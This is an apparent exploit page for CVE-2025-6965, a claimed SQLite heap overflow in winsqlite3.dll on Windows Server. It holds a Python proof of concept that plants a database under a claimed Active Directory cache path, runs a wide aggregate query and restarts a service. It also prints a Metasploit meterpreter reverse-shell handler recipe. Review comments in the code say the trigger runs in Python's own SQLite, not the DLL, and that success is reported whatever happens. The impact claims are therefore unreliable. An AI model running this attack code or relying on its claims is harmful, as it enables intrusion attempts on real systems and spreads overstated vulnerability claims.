## https://sploitus.com/exploit?id=PACKETSTORM:218680
# Exploit Title: SQLite 3.50.1 - Heap Overflow
    # Date: 2025-11-05
    # Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.sqlite.org
    # Software Link: https://www.sqlite.org/download.html
    # Version: SQLite < 3.50.2 (winsqlite3.dll)
    # Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched
    # CVE: CVE-2025-6965
    # CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L
    # Category: windows / local / dos / memory_corruption / active_directory
    # Platform: Windows
    # CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll
    # Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect
    # Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise
    # Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+
    # Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965
    # Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8
    # OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions
    # Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services)
    
    import os
    import shutil
    import sqlite3
    import subprocess
    import sys
    import time
    
    # ===============================
    # CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION
    # ===============================
    DB_PATH = "cve_2025_6965_winsqlite3.db"
    # NOTE(review): the page gives no evidence that any Windows component reads this
    # directory; "real AD cache path" is the author's assertion, not something the
    # code demonstrates.
    AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache"
    AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db")
    # Only consumed by print_listener(); no code in this file opens a socket to them.
    LISTENER_IP = "192.168.1.100"
    LISTENER_PORT = 4444
    # Per the author this service must be created by hand
    # (sc create ADSyncService binPath= "C:\path\to\service.exe"), i.e. it is not an
    # existing Windows component.
    SERVICE_NAME = "ADSyncService"

    # --- version gate ---
    # NOTE(review): this reads the version of the SQLite library that the Python
    # sqlite3 module was linked with (CPython ships its own), which is also the
    # library sqlite3.connect() below runs in. It is not the version of
    # winsqlite3.dll in System32, so a "vulnerable" verdict here says nothing
    # about the DLL named in the header.
    print(f"[!] SQLite Version: {sqlite3.sqlite_version}")
    if sqlite3.sqlite_version_info < (3, 50, 2):
        print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit")
    else:
        print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected")
        print("    Update applied via Microsoft Cumulative Update (post-July 2025)")
        sys.exit(1)
    
    # ===============================
    # STEP 1: Create Malicious AD Cache Database
    # ===============================
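    def create_vulnerable_db(db_path=None):
        """Create a fresh SQLite file holding one table ``ad_cache`` with a single row.

        Despite the name, the file contains nothing unusual: a two-column table
        (``id INTEGER PRIMARY KEY``, ``val INTEGER``) and one row with ``val = 1``.
        Any existing file at the path is deleted first so the result is the same
        on every run.

        Args:
            db_path: Where to write the database.  When omitted the module-level
                ``DB_PATH`` is used, which preserves the original call signature.

        Raises:
            OSError: if an existing file at the path cannot be removed.
            sqlite3.Error: if the file cannot be opened or a statement fails.
        """
        path = DB_PATH if db_path is None else db_path
        if os.path.exists(path):
            os.remove(path)
        conn = sqlite3.connect(path)
        try:
            cur = conn.cursor()
            cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)")
            cur.execute("INSERT INTO ad_cache (val) VALUES (1)")
            conn.commit()
        finally:
            # Close even when a statement fails so the file handle is not leaked.
            conn.close()
        print(f"[+] Malicious database created: {path}")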
    
    # ===============================
    # STEP 2: Generate Truncation Payload (300+ Aggregates)
    # ===============================
    def generate_malicious_query(num=100):
        """Build a SELECT with ``3 * num`` aggregate result columns over ``ad_cache``.

        Block ``i`` contributes ``COUNT(*) AS ci, SUM(val) AS si, AVG(val) AS ai``.
        NOTE(review): nothing on this page shows that this term count reaches the
        condition the advisory describes; with the default ``num`` this is a
        300-column SELECT, ordinary SQL well under SQLite's default column limit
        (SQLITE_MAX_COLUMN is 2000 by default).

        Args:
            num: Number of aggregate triplets to emit.

        Returns:
            The SQL text as a single string.
        """
        columns = []
        for i in range(num):
            columns.append(f"COUNT(*) AS c{i}")
            columns.append(f"SUM(val) AS s{i}")
            columns.append(f"AVG(val) AS a{i}")
        select_list = ", ".join(columns)
        return f"SELECT {select_list} FROM ad_cache"
    
    # ===============================
    # STEP 3: Deploy + Trigger in winsqlite3.dll Context
    # ===============================
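    def deploy_and_trigger():
        """Copy the prepared database to AD_DB_TARGET, run the wide query, restart SERVICE_NAME.

        Reads the module-level DB_PATH, AD_CACHE_DIR, AD_DB_TARGET and SERVICE_NAME
        and calls generate_malicious_query().  The query runs through Python's own
        sqlite3 module, i.e. inside the SQLite library that module was linked with
        (CPython ships its own), not inside winsqlite3.dll.

        Returns:
            None.  Outcomes are only reported on stdout.

        Raises:
            OSError: if the target directory cannot be created or the copy fails.
        """
        print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}")
        os.makedirs(AD_CACHE_DIR, exist_ok=True)
        # A plain file copy; spawning cmd.exe /c copy for this is unnecessary.
        shutil.copyfile(DB_PATH, AD_DB_TARGET)
        print("[+] Payload deployed to real AD path")

        query = generate_malicious_query(100)
        print("[*] Triggering heap overflow (300+ aggregates vs 1 column)...")

        # conn must exist before the try so the finally cannot hit an unbound name
        # when connect() itself raises.
        conn = None
        try:
            conn = sqlite3.connect(AD_DB_TARGET)
            conn.execute(query)
            print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)")
        except sqlite3.Error as e:
            # Every SQLite error lands here (unopenable path, locked file, SQL
            # error, ...).  A catchable exception is ordinary library error
            # reporting, not evidence of memory corruption; an in-process memory
            # fault would be expected to terminate the interpreter, not raise.
            print(f"[!] Query failed with {type(e).__name__}: {e}")
            print("    This is an ordinary SQLite error, not a confirmed heap overflow")
        finally:
            if conn is not None:
                conn.close()

        # Stop/start the hand-created service named in SERVICE_NAME.  net.exe is
        # an executable, so no shell is needed.
        print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...")
        try:
            subprocess.run(["net", "stop", SERVICE_NAME], timeout=10, capture_output=True)
        except (OSError, subprocess.SubprocessError) as e:
            # Best effort: a stop that fails or times out is not fatal here.
            print(f"[-] net stop did not complete: {e}")
        time.sleep(2)
        try:
            result = subprocess.run(["net", "start", SERVICE_NAME], capture_output=True)
        except OSError as e:
            print(f"[-] Service error: {e}")
            return
        if result.returncode == 0:
            print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault")
        else:
            # Decode tolerantly: console output is not guaranteed to be UTF-8 on Windows.
            print(f"[-] Service error: {result.stderr.decode(errors='replace')}")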
    
    # ===============================
    # STEP 4: RCE Listener Setup (For Advanced Exploitation)
    # ===============================
    def print_listener():
        """Print a canned Metasploit handler recipe to stdout.

        Reads the module-level LISTENER_IP and LISTENER_PORT.
        NOTE(review): nothing in this file delivers anything that would connect
        back to that address -- there is no socket code and no payload here --
        so this output has no functional relationship to the query run above.
        """
        rule = "=" * 70
        lines = [
            "",
            rule,
            " RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:",
            rule,
            "msfconsole -q",
            "use exploit/multi/handler",
            "set payload windows/x64/meterpreter/reverse_tcp",
            f"set LHOST {LISTENER_IP}",
            f"set LPORT {LISTENER_PORT}",
            "exploit -j",
            rule,
            "",
        ]
        print("\n".join(lines))
    
    # ===============================
    # MAIN - EXECUTION
    # ===============================
    if __name__ == "__main__":
        banner = "=" * 70
        print(banner)
        print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY")
        print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation")
        print(" Author: Mohammed Idrees Banyamer (@banyamer_security)")
        print(banner)

        # The three steps run in order; none of them returns a status, so the
        # closing "SUCCESSFULLY" line is printed whatever actually happened.
        for step in (create_vulnerable_db, deploy_and_trigger, print_listener):
            step()

        print("[+] EXPLOIT EXECUTED SUCCESSFULLY")
        print("    Check Event Viewer: Application Log โ†’ winsqlite3.dll Access Violation (0xC0000005)")
        print("    Fix: Apply latest Windows Cumulative Update IMMEDIATELY")
        print("    All Domain Controllers must be patched within 24 hours")